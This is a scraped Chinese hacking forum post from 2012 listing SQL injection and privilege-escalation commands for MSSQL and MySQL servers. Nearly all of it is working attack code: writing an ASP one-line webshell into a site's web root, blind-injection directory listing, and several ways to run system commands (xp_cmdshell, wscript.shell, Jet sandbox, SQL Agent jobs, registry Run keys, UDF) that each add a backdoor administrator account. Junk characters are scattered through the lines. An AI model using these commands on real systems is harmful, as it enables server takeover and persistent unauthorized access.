找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2910|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
# ^" J+ U3 f& s: X; D" F' v; ?首先确定网站的WEB路径
8 v" K0 ?4 A1 x1 d$ i! X% Z- [2 Q;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
% G: j" u9 d' c" }& B( C5 i$ j  u* |
9 W' ]! e7 r/ c" R;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
1 \/ Z8 U+ z8 ^//将一句话木马插入表中
, C9 }4 i4 ]( W/ @; q- t  {# J& `3 L2 h. y( H5 t% G% |2 y1 A
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 8 t$ [, s8 F& k
//导出一个ASP文件3 s9 b& `2 ~3 `1 W; Z/ h
7 [5 `% b' Z8 i  _- c% C
3 M) Y  t: ?# B6 x. c
关于MSSQL列目录
* l$ t/ {( N, d' ]. {! x;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
& K4 m4 X. ^1 N& m: MInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表8 X& J: L& N- D" ~& {1 |& f' |5 Q

4 x# \1 |' Y" f* @and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
; s% g" n0 G; d% p1 G  c! z8 l: A! k% _/ n9 c6 b3 ^0 I* E( x
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段! f! O, f& n3 n$ n, A# b
: l$ K# w* E; @: s$ U9 n$ `: j
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符/ Z. o! K( p! `
! o5 H) }4 P- I1 n7 F. d
! s! d! W& I8 h; [8 w9 ?0 i
数据库版本和权限查看
# S0 V' {6 ^2 i" V7 [& Cand 1=(select @@VERSION) //查看详细的数据库信息.1 s  M: x. k( |
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA9 t2 [" \7 Z$ ~+ \' D
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
7 \8 C2 H4 C1 |) ~0 X) h- ?/ r  q+ q, u1 J

, c+ @1 S/ E6 O; Y) u  E# k1.利用xp_cmdshell执行命令1 n- U( F. v3 e5 F
exec master..xp_cmdshell 'net user rfire 123456 /add'/ }9 o* A4 V$ R4 S
exec master..xp_cmdshell 'net localgroup administrators rfire /add': h8 `# r' F/ d$ M. w
9 u$ ^, F( w) ~
恢复xp_cmdshell存储过程/ F9 ~+ |, @  c' s; O# P& L
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
  n1 [' Q! H+ w8 n, l. z$ V$ J  }5 r( M( h/ M+ {. g

" F9 ^6 Q  _5 G! w, Y: t2.利用SP_OAcreate和SP_OAMETHOD执行命令8 ?4 r2 I8 W" X: s3 j% N; B
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下) n3 M' G1 I) I5 S' O
DECLARE @shell INT //建立一个@shell实体4 e, O' b' V* ~4 [+ z; _9 S" c# g
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
  l4 V* P: U( s, g2 b% rEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
& w! s1 v3 ]/ K: a) P) B) T8 O. n- e6 }& p" }

4 k2 V+ n  x& ]8 R3.利用沙盒模式' i; \5 n6 W, ?1 J- P; t/ d' e( v$ M
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。) h4 m/ o* F. s  |
开启沙盒模式:1 `6 h: @# {6 O( V8 H3 f; l* f
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0: G9 O7 c1 G: A+ K: A  a
/ |! ^2 R  W/ n7 ^$ F. j
执行命令:/ q8 Y( W7 U0 b: E/ {
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
' z8 `- h. \, a  t( K8 Y9 U
( x; X/ v0 O  t* \) u
4 E) S4 q5 x8 s" o/ C& w* d* X4.利用SQL代理执行命令
! n3 G  F6 F  Z( t" dEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务+ V- x1 S% F8 Q) I
; O" V. _6 z4 [  @  c
执行命令:
6 C9 }7 m1 \( r4 Y+ Juse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错9 y( {$ ]' a. K
exec sp_add_job 'x'9 m- ~+ p2 r  _- W, b( P
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业4 c" a; t. c. d5 k$ K5 `! B( v
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业) f8 R* }1 @% `2 ]4 v0 i
+ p# G: ?, G/ M" a4 \9 A

/ c, Q/ V) Y( Y: d7 D. T* K5 e5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)- O0 O1 P2 r; @% V6 \
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'; V" @1 Z( o! f( O3 O* S- r. [" c

0 S7 }* V# {3 l; P7 p5 Z& W
0 n4 [3 w0 o; H! N- k6.MYSQL的命令执行
! W; O3 q$ N1 e* D9 |9 d$ g+ \MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限), ]/ J* z/ Y+ g9 |
首先要在su.php下导出c:\windows\udf.dll. W5 J  P% V4 d/ n
导出后执行创建自定义函数命令:. F: l, a! z- g/ {# [; ^6 f" A& k
Create Function cmdshell returns string soname 'udf.dll'+ K1 Y& V- l! W* S7 u
执行命令" ]  |: n: ~- j5 j6 m/ T5 g
select cmdshell('net user rfire 123456 /add')
% U1 l& ?, @+ ^6 j+ g' s% p执行后删除函数 drop function cmdshell
3 e, T* o1 G1 G  Z2 G! V5 V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表